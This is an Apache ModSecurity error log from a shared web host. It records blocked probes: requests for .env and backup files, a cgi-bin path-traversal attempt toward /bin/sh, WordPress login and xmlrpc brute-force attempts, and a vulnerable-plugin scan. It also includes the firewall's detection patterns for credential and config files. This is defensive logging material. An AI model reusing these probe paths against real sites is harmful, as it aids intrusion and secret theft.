[Tue May 26 17:53:35.310477 2026] [security2:error] [pid 937900:tid 938148] [client 213.209.159.175:51834] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "207.174.214.47"] [uri "/api/.env/public/.env"] [unique_id "ahWQx04hPNS8CpkGLtbjlAAAAPs"]
[Tue May 26 17:53:36.449786 2026] [security2:error] [pid 937900:tid 938030] [client 213.209.159.175:51860] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "207.174.214.47"] [uri "/admin/.env.old"] [unique_id "ahWQyE4hPNS8CpkGLtbjuQAAAIU"]
[Tue May 26 17:53:36.980677 2026] [security2:error] [pid 937900:tid 938077] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQyE4hPNS8CpkGLtbjvgAAALQ"]
[Tue May 26 17:53:37.077958 2026] [security2:error] [pid 937900:tid 938072] [client 213.209.159.175:58868] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "207.174.214.47"] [uri "/stg/.env.bak"] [unique_id "ahWQyU4hPNS8CpkGLtbj0AAAAK8"]
[Tue May 26 17:53:37.210026 2026] [security2:error] [pid 937900:tid 938045] [client 213.209.159.175:58868] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "207.174.214.47"] [uri "/remote/.env"] [unique_id "ahWQyU4hPNS8CpkGLtbj0gAAAJQ"]
[Tue May 26 17:53:37.341400 2026] [security2:error] [pid 937900:tid 938085] [client 213.209.159.175:58868] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "207.174.214.47"] [uri "/App/.env"] [unique_id "ahWQyU4hPNS8CpkGLtbj2QAAALw"]
[Tue May 26 17:53:37.967771 2026] [security2:error] [pid 937900:tid 938069] [client 213.209.159.175:58876] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "207.174.214.47"] [uri "/Production/.env"] [unique_id "ahWQyU4hPNS8CpkGLtbj6QAAAKw"]
[Tue May 26 17:53:39.881781 2026] [security2:error] [pid 937900:tid 938113] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQy04hPNS8CpkGLtbkHgAAANg"]
[Tue May 26 17:53:40.398601 2026] [security2:error] [pid 937900:tid 938040] [client 85.208.96.193:19392] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/7/"] [unique_id "ahWQzE4hPNS8CpkGLtbkMwAAAI8"]
[Tue May 26 17:53:40.398749 2026] [security2:error] [pid 937900:tid 938040] [client 85.208.96.193:19392] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/7/"] [unique_id "ahWQzE4hPNS8CpkGLtbkMwAAAI8"]
[Tue May 26 17:53:40.965938 2026] [security2:error] [pid 937900:tid 938128] [client 64.233.173.168:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.yourstorybag.com"] [uri "/index.php"] [unique_id "ahWQyk4hPNS8CpkGLtbkCQAAAOc"]
[Tue May 26 17:53:41.185289 2026] [core:crit] [pid 937900:tid 938085] (13)Permission denied: [client 66.249.70.137:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:53:43.188408 2026] [security2:error] [pid 937900:tid 938057] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQzk4hPNS8CpkGLtbkdgAAAKA"]
[Tue May 26 17:53:43.721209 2026] [security2:error] [pid 937900:tid 937994] [remote 103.11.102.106:43398] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-login.php"] [unique_id "ahWQz04hPNS8CpkGLtbkkgAAnV0"]
[Tue May 26 17:53:43.873742 2026] [security2:error] [pid 937900:tid 938064] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQz04hPNS8CpkGLtbkkQAAAKc"]
[Tue May 26 17:53:43.913559 2026] [security2:error] [pid 937900:tid 938006] [remote 167.172.25.98:44002] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.25.172.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWQz04hPNS8CpkGLtbkmQAAuWk"]
[Tue May 26 17:53:45.858701 2026] [security2:error] [pid 937900:tid 938130] [client 23.158.233.122:53752] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 122.233.158.23.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWQ0U4hPNS8CpkGLtbk0AAAAOk"], referer: https://www.cagmedya.com/yenilikci-ve-etkili-web-tasarim-trendleri/
[Tue May 26 17:53:45.858890 2026] [security2:error] [pid 937900:tid 938130] [client 23.158.233.122:53752] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWQ0U4hPNS8CpkGLtbk0AAAAOk"], referer: https://www.cagmedya.com/yenilikci-ve-etkili-web-tasarim-trendleri/
[Tue May 26 17:53:46.362642 2026] [security2:error] [pid 937900:tid 938137] [client 23.158.233.122:53772] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWQ0k4hPNS8CpkGLtbk1wAAAPA"], referer: https://www.cagmedya.com/yenilikci-ve-etkili-web-tasarim-trendleri/
[Tue May 26 17:53:46.426847 2026] [security2:error] [pid 937900:tid 938146] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQ0U4hPNS8CpkGLtbk1gAAAPk"]
[Tue May 26 17:53:48.504037 2026] [security2:error] [pid 937900:tid 937954] [remote 47.128.126.152:31774] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "canopykaapi.com"] [uri "/brewing-methods/"] [unique_id "ahWQ1E4hPNS8CpkGLtblGAAA-TU"]
[Tue May 26 17:53:49.251898 2026] [security2:error] [pid 937900:tid 938121] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQ1E4hPNS8CpkGLtblKAAAAOA"]
[Tue May 26 17:53:51.342783 2026] [security2:error] [pid 937900:tid 938077] [client 66.249.70.160:46272] ModSecurity: Access denied with code 429 (phase 2). Pattern match "Googlebot[\\\\/-]" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/google.conf"] [line "3"] [id "901003"] [msg "Googlebot Crawler 429 ADDED BY MONITORING DO NOT WHITELIST"] [hostname "md-74.webhostbox.net"] [uri "/robots.txt"] [unique_id "ahWQ104hPNS8CpkGLtblbQAAALQ"]
[Tue May 26 17:53:51.598080 2026] [security2:error] [pid 937900:tid 938044] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQ104hPNS8CpkGLtblbAAAAJM"]
[Tue May 26 17:53:53.428727 2026] [security2:error] [pid 937900:tid 938060] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQ2U4hPNS8CpkGLtbljwAAAKM"]
[Tue May 26 17:53:54.150606 2026] [security2:error] [pid 937900:tid 938145] [client 110.249.202.100:22664] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "canopykaapi.com"] [uri "/robots.txt"] [unique_id "ahWQ2k4hPNS8CpkGLtbluQAAAPg"]
[Tue May 26 17:53:56.376715 2026] [security2:error] [pid 937900:tid 938127] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQ204hPNS8CpkGLtbl5wAAAOY"]
[Tue May 26 17:53:58.279908 2026] [security2:error] [pid 937900:tid 938060] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQ3U4hPNS8CpkGLtbmHQAAAKM"]
[Tue May 26 17:53:58.900275 2026] [security2:error] [pid 937900:tid 938080] [client 90.200.225.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQ3k4hPNS8CpkGLtbmMQAAALc"]
[Tue May 26 17:54:00.591038 2026] [security2:error] [pid 937900:tid 938067] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQ4E4hPNS8CpkGLtbmWQAAAKo"]
[Tue May 26 17:54:02.923445 2026] [security2:error] [pid 937900:tid 938100] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQ4k4hPNS8CpkGLtbmkQAAAMs"]
[Tue May 26 17:54:05.600290 2026] [security2:error] [pid 937900:tid 938123] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQ5U4hPNS8CpkGLtbm5gAAAOI"]
[Tue May 26 17:54:06.103169 2026] [security2:error] [pid 937900:tid 938038] [client 153.75.250.144:44584] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 144.250.75.153.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.preetishah.com"] [uri "/wp-content/plugins/dropbox-folder-share/HynoTech/UsosGenerales/js/editor-view.php"] [unique_id "ahWQ5k4hPNS8CpkGLtbm-QAAAI0"]
[Tue May 26 17:54:06.117814 2026] [security2:error] [pid 937900:tid 938112] [client 153.75.250.144:44590] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 144.250.75.153.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.preetishah.moes-art.com"] [uri "/wp-content/plugins/dropbox-folder-share/HynoTech/UsosGenerales/js/editor-view.php"] [unique_id "ahWQ5k4hPNS8CpkGLtbm-gAAANc"]
[Tue May 26 17:54:08.233162 2026] [security2:error] [pid 937900:tid 938090] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQ504hPNS8CpkGLtbnKwAAAME"]
[Tue May 26 17:54:09.161559 2026] [core:error] [pid 937900:tid 938122] [client 79.76.58.113:45348] AH10244: invalid URI path (/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh)
[Tue May 26 17:54:09.692805 2026] [autoindex:error] [pid 937900:tid 938148] [client 80.94.95.173:53596] AH01276: Cannot serve directory /home1/newde164/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://newdental.com.co/
[Tue May 26 17:54:10.054326 2026] [autoindex:error] [pid 937900:tid 938109] [client 80.94.95.173:53779] AH01276: Cannot serve directory /home1/newde164/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://newdental.com.co/
[Tue May 26 17:54:10.682291 2026] [security2:error] [pid 937900:tid 938078] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQ6k4hPNS8CpkGLtbncgAAALU"]
[Tue May 26 17:54:12.677433 2026] [security2:error] [pid 937900:tid 938049] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQ7E4hPNS8CpkGLtbnrgAAAJg"]
[Tue May 26 17:54:14.726033 2026] [security2:error] [pid 937900:tid 938038] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQ7k4hPNS8CpkGLtbn7QAAAI0"]
[Tue May 26 17:54:15.832003 2026] [security2:error] [pid 937900:tid 937924] [remote 103.145.62.145:9799] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 145.62.145.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWQ704hPNS8CpkGLtboGAAAoxc"]
[Tue May 26 17:54:16.092085 2026] [security2:error] [pid 937900:tid 938020] [remote 165.22.95.96:46278] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 96.95.22.165.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahWQ704hPNS8CpkGLtboHQAA7Hc"]
[Tue May 26 17:54:16.922721 2026] [security2:error] [pid 937900:tid 938038] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQ8E4hPNS8CpkGLtboMgAAAI0"]
[Tue May 26 17:54:17.517082 2026] [security2:error] [pid 937900:tid 938140] [client 172.86.66.156:59053] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.66.86.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWQ8U4hPNS8CpkGLtboRQAAAPM"], referer: https://www.cagmedya.com/
[Tue May 26 17:54:17.517280 2026] [security2:error] [pid 937900:tid 938140] [client 172.86.66.156:59053] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWQ8U4hPNS8CpkGLtboRQAAAPM"], referer: https://www.cagmedya.com/
[Tue May 26 17:54:18.962273 2026] [security2:error] [pid 937900:tid 938109] [client 111.225.149.221:13164] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "mahehealthcare.com"] [uri "/robots.txt"] [unique_id "ahWQ8k4hPNS8CpkGLtbodAAAANQ"]
[Tue May 26 17:54:19.233096 2026] [security2:error] [pid 937900:tid 938056] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQ8k4hPNS8CpkGLtboaQAAAJ8"]
[Tue May 26 17:54:22.089021 2026] [security2:error] [pid 937900:tid 938078] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQ9U4hPNS8CpkGLtboxAAAALU"]
[Tue May 26 17:54:23.664251 2026] [security2:error] [pid 937900:tid 938050] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQ904hPNS8CpkGLtbo6QAAAJk"]
[Tue May 26 17:54:24.671346 2026] [security2:error] [pid 937900:tid 938082] [client 49.13.130.29:30814] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahWQ-E4hPNS8CpkGLtbpAQAAALk"], referer: https://thegoodsporting.com
[Tue May 26 17:54:27.065080 2026] [security2:error] [pid 937900:tid 938135] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQ-k4hPNS8CpkGLtbpNgAAAO4"]
[Tue May 26 17:54:28.950787 2026] [security2:error] [pid 937900:tid 938083] [client 84.37.195.0:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahWQ_E4hPNS8CpkGLtbpSwAAALo"]
[Tue May 26 17:54:29.172107 2026] [security2:error] [pid 937900:tid 938042] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQ_E4hPNS8CpkGLtbpWwAAAJE"]
[Tue May 26 17:54:29.865244 2026] [security2:error] [pid 937900:tid 938109] [client 92.209.156.160:38204] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 160.156.209.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "proxuber.com"] [uri "/xmlrpc.php"] [unique_id "ahWQ_U4hPNS8CpkGLtbpcwAAANQ"]
[Tue May 26 17:54:29.865430 2026] [security2:error] [pid 937900:tid 938109] [client 92.209.156.160:38204] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "proxuber.com"] [uri "/xmlrpc.php"] [unique_id "ahWQ_U4hPNS8CpkGLtbpcwAAANQ"]
[Tue May 26 17:54:30.960688 2026] [security2:error] [pid 937900:tid 938071] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQ_k4hPNS8CpkGLtbphAAAAK4"]
[Tue May 26 17:54:33.383196 2026] [security2:error] [pid 937900:tid 938074] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRAE4hPNS8CpkGLtbpwwAAALE"]
[Tue May 26 17:54:36.027344 2026] [security2:error] [pid 937900:tid 938046] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRA04hPNS8CpkGLtbp8wAAAJU"]
[Tue May 26 17:54:38.460945 2026] [security2:error] [pid 937900:tid 938112] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRBk4hPNS8CpkGLtbqKwAAANc"]
[Tue May 26 17:54:39.391497 2026] [security2:error] [pid 937900:tid 938073] [client 172.98.32.33:32231] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.32.98.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahWRB04hPNS8CpkGLtbqQQAAALA"]
